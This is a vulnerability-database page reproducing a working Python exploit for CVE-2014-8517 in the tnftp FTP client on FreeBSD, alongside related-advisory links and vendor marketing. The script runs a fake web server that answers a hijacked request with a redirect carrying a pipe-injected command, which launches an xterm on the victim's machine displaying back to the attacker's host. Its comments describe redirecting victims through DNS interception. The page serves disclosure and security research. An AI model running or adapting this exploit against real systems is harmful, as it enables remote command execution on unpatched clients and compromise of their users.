Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side

🗓️ 02 Dec 2014 00:00:00Reported by dashType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 54 Views

tnftp (FreeBSD 8/9/10) client side exploit, CVE-2014-851

Related
Code
ReporterTitlePublishedViews
Family
0day.today		tnftp "savefile" Arbitrary Command Execution Exploit
10 Nov 201400:00
zdt
0day.today		tnftp - clientside BSD Exploit
16 Dec 201400:00
zdt
0day.today		tnftp (savefile) Arbitrary Command Execution Exploit
3 Nov 201700:00
zdt
FreeBSD		FreeBSD -- Remote command execution in ftp(1)
4 Nov 201400:00
freebsd
ArchLinux		tnftp: arbitrary command execution
1 Nov 201400:00
archlinux
Circl		CVE-2014-8517
3 Nov 201700:00
circl
Check Point Advisories		NetBSD tnftp fetch.c fetch_url Command Execution (CVE-2014-8517)
16 Nov 201400:00
checkpoint_advisories
CVE		CVE-2014-8517
17 Nov 201416:00
cve
Cvelist		CVE-2014-8517
17 Nov 201416:00
cvelist
Debian CVE		CVE-2014-8517
17 Nov 201416:00
debiancve
Rows per page
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Date: [11/29/2014]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9.3]
# CVE : [CVE-2014-8517]

# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
#
# 29 Nov 2014 by [email protected]
#
# usage: 
# 
# redirect the vulnerable ftp client requests for http to your machine
#
# client will do something like: 
# ftp http://ftp.freebsd.org/data.txt
#
# you will intercept the dns request and redirect victim to your fake webserver ip
#
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1 
# probably do also xhost+victimip
#
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
# 
# sadly you cannot put a slash behind the | also www-encoded is not working
# plus problems with extra pipes
# this renders a lot of usefull commands useless
# so xterm -display it was ;)
#
# *dirty* *dirdy* *dyrdy* *shell* !
#

import os
import sys
import time
import socket


def usage():
	print "CVE-2014-8517 tnftp exploit"
	print "by [email protected] in 29 Nov 2014"
	print
	print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
	print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])

#bind a fake webserver on 0.0.0.0 port 80
def webserveRedirect(redirect):

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.bind(("0.0.0.0",80))
	s.listen(3)
	h, c = s.accept()

	#wait for request
	#print h.recv(1024)

	#send 302 
	print "[+] Sending redirect :>"
	h.send(redirect)
	s.close()
	return 0

#bind a fake webserver on port %rport
def deliverUgga(owned):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.bind(("0.0.0.0",rport))
	s.listen(3)
	h, c = s.accept()

#	print h.recv(1024)
	print "[+] Deliver some content (shell is spwaned now)"
	h.send(owned)
	s.close()

	return 0

owned="""HTTP/1.1 200 Found
Date: Fri, 29 Nov 2014 1:00:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html; charset=iso-8859-1


ugga ugga
"""

if(os.getuid())!=0:
	print "[-] Sorry, you need root to bind port 80!"
	sys.exit(1)

if len(sys.argv)<3:
	usage()
	sys.exit(1)

rip = sys.argv[1]
rport = int(sys.argv[2])
revip = sys.argv[3]

print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"

# ok, lets use xterm -display
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace(" ","%20")

print "[+] Payload: [%s]" % cmd

redirect = 	"HTTP/1.1 302\r\n"\
		"Content-Type: text/html\r\n"\
		"Connection: keep-alive\r\n"\
		"Location: http://%s:%d/cgi-bin/|%s\r\n"\
 		"\r\n\r\n" % (rip,rport,cmd)

#child process owned data delivery
uggapid = os.fork()
if uggapid == 0:
	uggapid = os.getpid()
	deliverUgga(owned)
else:
#child proces for webserver redirect
	webpid = os.fork()
	if webpid == 0:
		webpid = os.getpid()
		webserveRedirect(redirect)



#childs, come home!
try:
	os.waitpid(webpid,0)
except:
	pass
try:
	os.waitpid(uggapid,0)
except:
	pass

#oh wait :>
time.sleep(5)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Dec 2014 00:00Current
3.7Low risk
Vulners AI Score3.7
CVSS 27.5
EPSS0.84981
freebsdexploitclient sidecve-2014-8517security advisoryftppython10tnftpvulnerabilitywebserverreverse xtermdnstcphttpshell
54